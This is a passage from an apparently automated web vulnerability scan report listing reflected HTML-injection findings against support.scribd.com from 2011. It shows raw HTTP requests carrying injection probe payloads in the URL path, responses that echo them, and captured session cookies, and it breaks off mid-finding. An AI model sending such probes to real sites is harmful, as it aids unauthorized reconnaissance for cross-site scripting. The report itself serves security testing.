This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/azo6pbskoyom0rkbf3d2"><a>3db8303db4d/?name=20110817-padusmks7i4nqie8kaqkq2euh7.jpeg HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIjaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9ob21lOg9zZXNzaW9uX2lkIiU1NDI1YTc2NTgwODdiMmFmOWFiZDdmYjlkZjU0YmQ2MDoPdXBkYXRlZF9hdGwrB1%2FsjU4iE3dhcmRlbi5tZXNzYWdlewA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPToHaWQiFG0xZGxzZzM0ZndhMDNkdg%3D%3D--bdc4a3dabdb12e31cce91c198f04e3331e99c805

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 17:59:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 360
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byIBf2h0dHA6Ly9zdXBwb3J0LnNjcmliZC5jb20vYXR0YWNobWVudHMvdG9rZW4vYXpvNnBic2tveW9tMHJrYmYzZDIiPjxhPjNkYjgzMDNkYjRkLz9uYW1lPTIwMTEwODE3LXBhZHVzbWtzN2k0bnFpZThrYXFrcTJldWg3LmpwZWc6D3Nlc3Npb25faWQiJWExOWI2OWEyODkwYjgwOWJhODcyMzRlOWQ1NzllZTA4Og91cGRhdGVkX2F0bCsHm%2ByNTjoQX2NzcmZfdG9rZW4iMW1RSEpHdHJNR3JNSy9TOFd1N0xteldQMy9Gb3NkRk1abkJNWlkveFczSjg9OgdpZCIVOWtwbHNlMnE2LXhrejNpMw%3D%3D--2a7414746839732dc18ef12ce3aa331aeb16bcec; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/azo6pbskoyom0rkbf3d2"><a>3db8303db4d/?name=20110817-padusmks7i4nqie8kaqkq2euh7.jpeg" />
...[SNIP]...

1.53. http://support.scribd.com/attachments/token/bnf0zmw7onpa5ww/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/bnf0zmw7onpa5ww/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ec4"><a>c111915f435 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/bnf0zmw7onpa5ww28ec4"><a>c111915f435/?name=home-myshelf-dh-annotated.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 182
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJ5aHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi9ibmYwem13N29ucGE1d3cyOGVjNCI%2BPGE%2BYzExMTkxNWY0MzUvP25hbWU9aG9tZS1teXNoZWxmLWRoLWFubm90YXRlZC5wbmc6D3Nlc3Npb25faWQiJTE4MDcyMTA1NzEwYzEwNWI2YTNjNDdjZGM0MGI1OTAxOg91cGRhdGVkX2F0bCsHyOyNTjoQX2NzcmZfdG9rZW4iMTkzR1V3TnVndU9uMTZTcjg4bmFJUVFkQmJEMlc5YVQxcnYxQ1hDb2NkbnM9OgdpZCIUbTEzbHM1aW10YTljajZy--6ca473042245ca895048dfc75a3873ec08c82dd0; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/bnf0zmw7onpa5ww28ec4"><a>c111915f435/?name=home-myshelf-dh-annotated.png" />
...[SNIP]...

1.54. http://support.scribd.com/attachments/token/hdh23udvkqbhtpw/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/hdh23udvkqbhtpw/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4537c"><a>2aabf8387b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/hdh23udvkqbhtpw4537c"><a>2aabf8387b9/?name=quick-menu.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:03:36 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 78
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJqaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi9oZGgyM3VkdmtxYmh0cHc0NTM3YyI%2BPGE%2BMmFhYmY4Mzg3YjkvP25hbWU9cXVpY2stbWVudS5wbmc6D3Nlc3Npb25faWQiJTI5OTVkOThiMTQyNDMzMGI0MzNlZjJmMWQ1NWUyNDBlOg91cGRhdGVkX2F0bCsHeO2NTjoQX2NzcmZfdG9rZW4iMWJoSnhhWVJwSW1EdlZvMjdZb0FkUXlRbzJXVVMydkpCakc0cmRua0JqQ2M9OgdpZCIUZHFsbHNuOWJ2LW4xeW1m--46d3faf70f111117fcc6ef369428803b962cff9f; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/hdh23udvkqbhtpw4537c"><a>2aabf8387b9/?name=quick-menu.png" />
...[SNIP]...

1.55. http://support.scribd.com/attachments/token/t37e3dxobjw3x1a/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/t37e3dxobjw3x1a/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3be7d"><a>3a42925c5b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/t37e3dxobjw3x1a3be7d"><a>3a42925c5b6/?name=home-myinfo-annotated.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 68
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJ1aHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi90MzdlM2R4b2JqdzN4MWEzYmU3ZCI%2BPGE%2BM2E0MjkyNWM1YjYvP25hbWU9aG9tZS1teWluZm8tYW5ub3RhdGVkLnBuZzoPc2Vzc2lvbl9pZCIlMTc1Nzc2OTkwYWFhYTQwYTcyMzQ0Y2RkZDQyYzU2NmE6D3VwZGF0ZWRfYXRsKwe%2F7I1OOhBfY3NyZl90b2tlbiIxNTAxcVVqZ0pMbkw3VTlYRE5Jelg3VGtpVHhmSGd5SEVFMEMrSHpyTVJabz06B2lkIhVnbG5sczhtMG0td2F4NHl4--ae26d0362a41c77b597d018ef31dfc06c07483c9; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/t37e3dxobjw3x1a3be7d"><a>3a42925c5b6/?name=home-myinfo-annotated.png" />
...[SNIP]...

1.56. http://support.scribd.com/attachments/token/tiana38wf3sn2gu/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/tiana38wf3sn2gu/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b05"><a>59d6fcf3f9b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/tiana38wf3sn2gu90b05"><a>59d6fcf3f9b/?name=profile-info-annotated.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Thu, 06 Oct 2011 18:00:36 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Runtime: 86
Set-Cookie: _zendesk_session=BAh7DCIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJ2aHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9hdHRhY2htZW50cy90b2tlbi90aWFuYTM4d2Yzc24yZ3U5MGIwNSI%2BPGE%2BNTlkNmZjZjNmOWIvP25hbWU9cHJvZmlsZS1pbmZvLWFubm90YXRlZC5wbmc6D3Nlc3Npb25faWQiJWMyODBhYjllZGM2MTBlYTgzZjNmM2M4NDJmZGRhYzkxOg91cGRhdGVkX2F0bCsHxOyNTjoQX2NzcmZfdG9rZW4iMWNlekxRdWppS3VjeUFVMVBBQnBZc08xdWxEVlVUenI2UllGb1N2RHFqTHc9OgdpZCIUN2d4bHNjeHB3d3h2YTBm--540cb3091774a42adf0fbca29b4ba282079148f0; path=/; HttpOnly
Cache-Control: no-cache
Content-Length: 16326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-e
...[SNIP]...
<link rel="canonical" href="support.scribd.com/attachments/token/tiana38wf3sn2gu90b05"><a>59d6fcf3f9b/?name=profile-info-annotated.png" />
...[SNIP]...

1.57. http://support.scribd.com/attachments/token/uovongz3v3j4r5n/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.scribd.com
Path:   /attachments/token/uovongz3v3j4r5n/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c150"><a>d71f373899f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attachments/token/uovongz3v3j4r5n9c150"><a>d71f373899f/?name=profile-shelf-annotated.png HTTP/1.1
Host: support.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://support.scribd.com/entries/49631-your-scribd-homepage-public-profile-and-shelf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; __qca=P0-1314780605-1317923807712; _scribd_session=BAh7BzoMY3NyZl9pZCIlMWQxN2JlYTA2ZWZhNDUxMzE1YWMwYTAyZTlkOWFkNWMiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--7f999eef9572e13045be744d4a1b7069da63199c; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.15.7.1317923903488; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1; _zendesk_session=BAh7DjoQc291cmNlX3BhZ2UiCy9ob21lPyIOaXNfbW9iaWxlRjoMYWNjb3VudGkC8Rk6DnJldHVybl90byJaaHR0cDovL3N1cHBvcnQuc2NyaWJkLmNvbS9lbnRyaWVzLzQ5NjMxLXlvdXItc2NyaWJkLWhvbWVwYWdlLXB1YmxpYy1wcm9maWxlLWFuZC1zaGVsZjoPc2Vzc2lvbl9pZCIlNTQyNWE3NjU4MDg3YjJhZjlhYmQ3ZmI5ZGY1NGJkNjA6EF9jc3JmX3Rva2VuIjEzQW1mRmx6VGdzQXBQQVpJYzRIZU5VTmJuQlk0UUhhZ3l6OFB6UkovU25jPSITd2FyZGVuLm1lc3NhZ2V7ADoPdXBkYXRlZF9hdGwrB3rsjU46B2lkIhRtMWRsc2czNGZ3YTAzZHY%3D--5c8139ef42ec43e398abf32fff62f04b3f63ac31

Response

